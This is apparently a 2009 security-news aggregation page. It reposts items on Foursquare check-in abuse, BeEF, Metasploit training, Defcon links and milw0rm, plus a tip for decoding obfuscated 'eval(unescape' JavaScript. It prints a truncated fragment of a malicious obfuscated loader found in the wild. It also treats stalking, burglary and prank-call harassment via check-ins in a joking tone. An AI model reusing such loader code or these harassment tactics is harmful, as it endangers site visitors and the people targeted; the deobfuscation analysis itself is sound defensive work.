The Edge of I-Hacked

From phonelosers.org

By going to search.twitter.com, you can type in 4sq.com and you’ll get a list of everyone on the planet that is currently checking in to someplace. You can even modify your search to include only local businesses. This is great for creepy stalkers who want to keep tabs on random pretty girls. A creepy stalker could jump in his car and speed to the pub for a chance to meet the girl of his dreams. Everywhere she goes.

Another use for Foursquare is for burglars to know when houses are empty. If @sexygirl535 is out having fun with her friends at a bar, then she’s not home, right? So quick, drive over there and break into her house! You know she doesn’t have roommates because she constantly tweets about how it sucks to live alone. A website called Please Rob Me has been set up for just this purpose.

And then there’s the PLA’s favorite pasttime – making prank calls to people. Foursquare is the perfect tool for this. In that search box up there, you click on the Twitter username which probably gives you the name of the person checking in. Then you click on the link in their post and you’ll have the phone number of the business they’re at. Now you can call the business, ask for that person and say something crazy to them. They’re almost always surprised that anyone could know that they’re there. It rarely occurs to them that just minutes ago they transmitted their location to the entire world. Visit the site to Listen to these:

I’m From The Future! Gil gets a call from himself in the future, warning him of dire consequences if he buys Tylenol. Gil doesn’t believe himself.

Shaggy gets a telemarketing call from the Red Cross while eating at Royal Thai Cuisine.

Nicole is getting a pedicure when she gets a call from a Foursquare representative, warning her not to post her location to the public.

Blockbuster tells Sabrina that she’s no longer welcome in their stores. She posted a series of tweets after this calls which went like this: “Just had the dumbest prank played on me thx to foursquare! Guy called Blockbuster, asked for me, told me he was from Corp. & that I wasn’t…..welcome there, and how to leave the store! I was so frickin’ pissed that someone had the nerve to call the store and do that shit!…..I hung up on the tool and told the Blockbuster staff, who were very apologetic. Just a reminder to be careful on foursquare updates! Seriously though! If that had been real, I would have been SO insulted! Just beware of any weird calls if you check-in on foursquare!”

Carlie is surprised to get a call from an internet stalker and decides on the phone not to use Foursquare anymore.

via Social Hacking.

Many security researchers are familiar with BeEF, a browser exploitation framework by Wade Alcorn. In short, BeEF is a program that brings together various types of code for taking advantage of known vulnerabilities in web browsers. If a target computer loads a certain bit of code within a web page, that code connects to a server control panel which can then execute certain attacks against the “zombie” machine.After noting potential security issues with the gadgets in Google Wave, I set about to finally setup a BeEF testbed and see if Google Wave was as capable a platform for malware delivery as I suspected.

via Introduction to Metasploit Unleashed.

Free MetaSploit Class — YEA!

This is it! After months of hard work, we are finally ready to present the free version of our online course – Metasploit Unleashed – Mastering the Framework. This resource will be a living, breathing Metasploit documentation entity. We will keep on updating and adding new modules and chapters as the MSF evolves.

This course has be written in a manner to encompass not just the front end “user” aspects of the framework, but rather give you an introduction to the capabilities that Metasploit provides. We aim to give you an in depth look into the many features of the MSF, and provide you with the skill and confidence to utilize this amazing tool to its utmost capabilities.

Here we will try to sort out all the news, blogs, tools and more. Check back for updates and comment any findings.

Videos:
Defcon 17 Awards Ceremony **Check out I-Hacked/RBCP @ 01:04:56**
Interview Nathan Hamiel and Shawn Moyer on hacking Web 2.0
Quadrotor UAV at Defcon 17
Apple keyboard with evil firmware can root any computer
hacking-defcon-2009-badge
video of KreiosC2
Hacking the iPhone
Defcon Video by Ax0n

Tools/Slides:
dnsTTrap
ucsniff
ippon
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Foca Online
Tactical Fingerprinting using Foca
maltego-firefox
CSRF – Yeah, It Still Works
KreiosC2
Prank o Matic

Photos:
vissago
stits -some NSFW-
epitti

Music:
BlackBall Defcon 17- up’D by Great Scott

Misc/Blog:
Black Hat USA 2009 Media Archives
Ax0n’s DefCon 17 Wrap-Up
RBCP’s Blog on Defcon
DEFCON 0×11 Post-Mortem

News:
Feds at DefCon Alarmed After RFIDs Scanned
Researchers offer tools for eavesdropping and video hijacking
Danger from automatic updates
Hanging with hackers can make you paranoid
Rio hotel in Las Vegas responds to claims over malicious ATMs
Malicious ATM Catches Hackers
iPhone attacked by SMS – Danger!

via BackTrack Information Security Distribution » Metasploit Unleashed – Mastering the Framework.

The course will be presented in the usual “Offensive Security” online format pdf + videos and is designed to surprise even experienced MSF users.

The PDF guide along with offline labs for the course will be free of charge. We are working with Metasploit.com and Hackers for Charity to put all proceeds from this course towards feeding children in Kenya and Uganda. The course videos will be available for a small fee. All proceeds will be donated to Hackers for Charity.

This course opens up a new Metasploit Framework Certification track – the OSMP, Offensive Security Metasploit Professional. The certification exam will be based on hands-on exercises requiring the student to prove they have mastered the MSF in all aspects. The Certification will only be available to those who purchase the videos – our way of encouraging donations to HFC. Remember – all proceeds go towards a very good cause.

The course is almost ready and we expect a public release around late August, 2009.

via hackersforcharity.org

The bottom line is PayPal has frozen my assets (which aren’t theirs.. how can they do this?) including all the support money my family is relying on.

I’ve spent hours on the phone (on hold) to PayPal at approximately 30 cents a minute to try to get this resolved only to be told to use email. I’m considering legal action over this.

HFC is at a complete standstill. We can not order shirts for the conference. Subscriptions are bouncing. Informer is down. Subscribers are (rightly) pissed because they don’t have what they’ve paid for. I can’t order the items for the DEFCON auction. There are too many problems to list here. The biggest is that PayPal has locked down my family’s survival money.

I have no clue what to do at this point.

Does the EFF have any leverage? I can’t tell you how tempted I am to just turn to the dark side here and…

Paypal are you out there? Help Johnny & his good cause out!

via SecuriTeam Blogs » Bye milw0rm?

I saw a message from Jericho giving his goodbyes to str0ke, and had to see it for myself. Indeed:

Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don’t : . For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours taking off weekends isn’t fair to the authors on this site. I appreciate and thank everyone for their support in the past.
Be safe, /str0ke

We all hope it’s just temporary and str0ke will bounce back. And if that doesn’t happen, hopefully someone else will pick it up and continue. It’s a thankless job of tedious work but it gives “the good guys” a fighting chance by putting together in an organized manner things that are already know to the bad people out there.

Hopefully this is not a farewell, but if it is, milw0rm will be missed.

Readers: If you have suggestions for good exploit archives other than this exploit archive, of course that should go on the bookmark list where milw0rm was, please post in the comments below.

I hereby declare that WED JULY 1st is Twitter Security Day (#twittersec). I do so with good reason. As it stands, the guys at http://twitpwn.com/ have declared July the “Month of Twitter Bugs” (MoTB). Taken from their site:

Today, three years after the “Month of Browser Bugs”, I’ve decided to declare July 2009 as “Month of Twitter Bugs” (MoTB). I’m doing so in order to raise the awareness of the Twitter API issue I recently blogged about. MoTB could have been easily converted to any other “Month of Web2.0 service bugs”, and I hope that Twitter and other Web2.0 API providers will work closely with their API consumers to develop more secure products.
Each day I will publish a new vulnerability in a 3rd party Twitter service on the twitpwn.com web site. As those vulnerabilities can be exploited to create a Twitter worm, I’m going to give the 3rd party service provider and Twitter at-least 24 hours heads-up before I publish the vulnerability.
Even though I have enough vulnerabilities for this month, you are more than welcomed to send me (via email or twitter) vulnerabilities you find in 3rd party Twitter services. I will do my best to publish all submitted vulnerabilities. I will, of course, credit the submitter.

So what does #twittersec mean? What should you do?

Simple: On Wed, July 1st CHANGE YOUR TWITTER PASSWORD.

How many times have you given your twitter password to a third party site? Did you change your password after you did that? Well, if not here is a good time to do so. Yes, it is true that changing your password doesn’t invalidate all of the “MoTB” however, it could help stop a few. And really, it is probably time that you do it anyways, don’t you think?

Even more importantly #twittersec‘s goal is to raise awareness to the “MoTB” and to put pressure on the developers to fix the vulnerabilities in these third party apps.

Please help spread the word about Month of Twitter Bugs and #twittersec day!

from Core Security Technologies

Register below for this free webcast on Tuesday, June 30, 2009 at 2pm EDT / 11am PDT GMT -4:00, New York. Upon registering, you’ll receive an email confirmation containing teleconference and login information. A recording of the webcast will be sent to everyone who registers, so be sure to sign up even if you can’t make the live session.

About this webcast:
The most effective web application pen testers expose the risks that vulnerabilities pose to the business, rather than just to the application itself. “The Art of Combining Web Pen Testing Techiques” series explores the art of replicating web attacks that take advantage of multiple vulnerabilities, revealing greater business risks than would be possible by simply analyzing vulnerabilities on an individual basis.

In this first webcast of the trilogy, Kevin Johnson and Ed Skoudis will discuss SQL and content injection. We will look at a number of powerful tools to assist in discovering these flaws, in addition to making exploitation simpler.

The webcast will also outline and run through a real-world scenario that demonstrates how these tools and attacks can be used directly in a penetration test. The scenario will illustrate the use of SQL injection to insert content on a website that will, in turn, give the tester full control of the selected in-scope browsers and systems that access the target site.

Also known as “eval( unescape” decryption

Recently, @surbo was working an investigation where he came across some obfuscated code which was innocuously included in an otherwise un-threatening html file. He had noticed that the result of the code was to push the client to a .js file which was being hosted on a .cn domain. (that cant be good)

However when viewing the source of the html page, he was presented with a fairly common technique often called “Encrypting HTML” which really should be considered “Obfuscating HTML” because all that the programmer has done is converted “human readable” code into “Human-Unreadable, yet Browser-Readable” code. Below is a small extract of this obfuscated code.

<script>eval( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d));

He needed to come up with a way to easily de-obfuscate this, and came up with something I feel very clever.. Re-write eval into alert and save it to a local file.

Re-Written:
<script>alert( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d));

When loaded into a browser, the BROWSER to translate the obfuscated code into human readable form, and give it to you in a nice alert box allowing you to copy and paste!

Well, this is an easy way to do it by hand if you are ever in a pinch.. But if you are using firefox I suggest you should check out JavaScript Deobfuscator